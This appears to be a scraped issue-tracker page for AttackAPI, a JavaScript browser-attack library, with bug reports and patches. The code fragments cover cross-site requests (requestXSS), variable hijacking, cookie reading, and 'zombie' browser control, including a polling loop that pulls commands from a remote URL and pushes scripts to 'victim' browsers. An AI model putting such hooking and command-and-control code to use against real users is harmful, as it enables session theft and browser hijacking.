kvasilov48 / attackapi Goto Github PK

make a function hijackVar for logging everytime a variable's content is
accessed.

code:
    AttackAPI.dom.hijackVar = function (varo,callback) {
        if(varo.hijacked)return varo;
        var varn=Object();
        varn.original=varo;
        varn.valueOf=varn.toSource=varn.toString=function () {
            if(callback)callback();
            return this.original;
        };
    };

the building system should export the project wiki into the doc/ through
google's subversion and integrate it withing the document generation
application. wiki parser is required!

What steps will reproduce the problem?
1. any AttackAPI function call that creates an iframe assigning an onload 
function. 
let's take requestXSS, for instance.

What is the expected output? What do you see instead?
IE won't call the dynamically assigned onload function.

What version of the product are you using? On what operating system?


Please provide any additional information below.
We may have to use smt. like below;

...
if(AttackAPI.dom.getAgent() == 'msie'){
  ifr.onreadystatechange = function(){
    if(ifr.readyState=="complete"){
       // ...
    }
  };
}
...

What steps will reproduce the problem?
1. Load AttackAPI
2. In Firebug, type
var b = new Object();
b.url = 'http://www.google.com/'
b.onload = function(d, r) { alert('foo'); alert(d['data']); alert(r.url); };
AttackAPI.dom.requestXSS(b);

What is the expected output? What do you see instead?
I expect to see a popup with foo, a popup with some data and a popup with
http://www.google.com/
Instead, I see a popup with foo, a popup with null and a popup with
http://www.google.com/

What version of the product are you using? On what operating system?
Tested with version 2.2.0a in Firefox on Freebsd

Please provide any additional information below.
Maybe I didn't understand the purpose of the requestXSS function, there is
no documentation for it.

What steps will reproduce the problem?
1. function dom.spawnSandbox(data) doens't return the sandbox with my data
as parameter.

What is the expected output? What do you see instead?

AttackAPI.dom.spawnSandbox( { myfn: function() { alert('hi'); } }
).scope.myfn();

spawnSandbox should return sandbox object with myfn extended in scope
object, but it doesn't.

What version of the product are you using? On what operating system?
2.2.0a - XP SP2

Please provide any additional information below.

this is the original piece of code:

AttackAPI.dom.spawnSandbox = function (data) {   
...
...
ifr.onload = function () 
{
    laded = true;   
        AttackAPI.core.extend(ifr.contentWindow, data);
        for (var i = 0; i < queue.length; i++)
        sandbox.evaluate(queue[i]);
    };
    return sandbox;
}
END


i resolved extending the ifr.contentWindow before the ifr.onload function:


AttackAPI.dom.spawnSandbox = function (data) {   
...
...
AttackAPI.core.extend(ifr.contentWindow, data);

    ifr.onload = function () {
        loaded = true;
        for (var i = 0; i < queue.length; i++)
            sandbox.evaluate(queue[i]);
    };

    return sandbox;
}
END

There are a couple of things that needs to be fixed in the next version of
MasterAPI.

1. The console has to work with Opera, IE6, IE7 and Firefox
2. The shell has to work with Opera, IE6, IE7 and Firefox
    - fix the "eval" and "with" statements
    - the shell needs to create a insatance of a shell object and return that
      to the developer for further use

add support for various types of data urls

DataURLEncoder --> for the data: schema
JavaScriptDataURLEncoder --> for the javascript: schema

Reading the code:
AttackAPI.encodeURL = function (u) {
    return escape(url);
};
url should be u.

Code:
    AttackAPI.dom.zombiefyL = function (url, interval) {
        var interval = (interval == 'undefined')?interval:2000;

        window.setInterval(function () {
            AttackAPI.dom.requestJSL(url + '?action=pull');
        }, interval);
    };

What is the expected output? What do you see instead?
Shouldn't it be:
var interval = (interval != 'undefined')?interval:2000;


Please provide any additional information below.

* support for groups
* support for RSS output
* support for targets
* support for dynamic client names
* support for multi-client requests

There are no downloads under the Downloads tab, neither at 
http://www.gnucitizen.org/blog/attackapi/

This is a trivial one;

What steps will reproduce the problem?
1.
with document.cookie is equal to PHPSESSID=9b243572455a4d62683de5dd8544da1e
a javascript line like below
myCookieVal = AttackAPI.dom.getCookie("PHPSESSID");

What is the expected output? What do you see instead?
expected output: 
myCookieVal = 9b243572455a4d62683de5dd8544da1e
instead;
myCookieVal = null

What version of the product are you using? On what operating system?
2.2.0a, XPPro_SP2, IE6

Please provide any additional information below.
lines in getCookie function 

  if (cookie == unescape(pair.substring(0, name.length)))
    return unescape(pair.substring(name.length + 1));

might be changed to 

  if (cookie == unescape(pair.substring(0, cookie.length)))
    return unescape(pair.substring(cookie.length + 1));

What steps will reproduce the problem?
1. in one browser, let's say IE, create a zombie, extend with an onpull
function and start it. (victim)
2. in another browser, say FF, create another zombie, list victim zombies,
and send a message via push("alert(1)", "GLOBAL") 

What is the expected output? What do you see instead?
I should see the "alert(1)" message at the victim's onpull function.

What version of the product are you using? On what operating system?
2.2.0a, XPSP2

Please provide any additional information below.

should I have sent an email instead I don't know. Anyways here it goes;

In AttackAPI 2.2.0a, in "AttackAPI.dom.spawnChannel" method, there are
"transport" and "evaluate" functions. These functions send "referrer" query
parameters. 

With these in hand, a master (yet another zombie, in fact) can't push
messages to clients, since clients fetch their corresponding messages
indexed via their referrers:

array_shift($_SESSION['_message_queue'][$REFERRER])

Actually I didn't try hard to understand but what do you use referrers for?

My patch was to do this;

function transport(query) {
  AttackAPI.core.extend(query, {
    /*referrer: channel.referrer,*/
    __r: Math.random() + '_' + new Date().getTime()});
    AttackAPI.dom.transport({url: channel.location, query: query});
}

same with the evaluate function...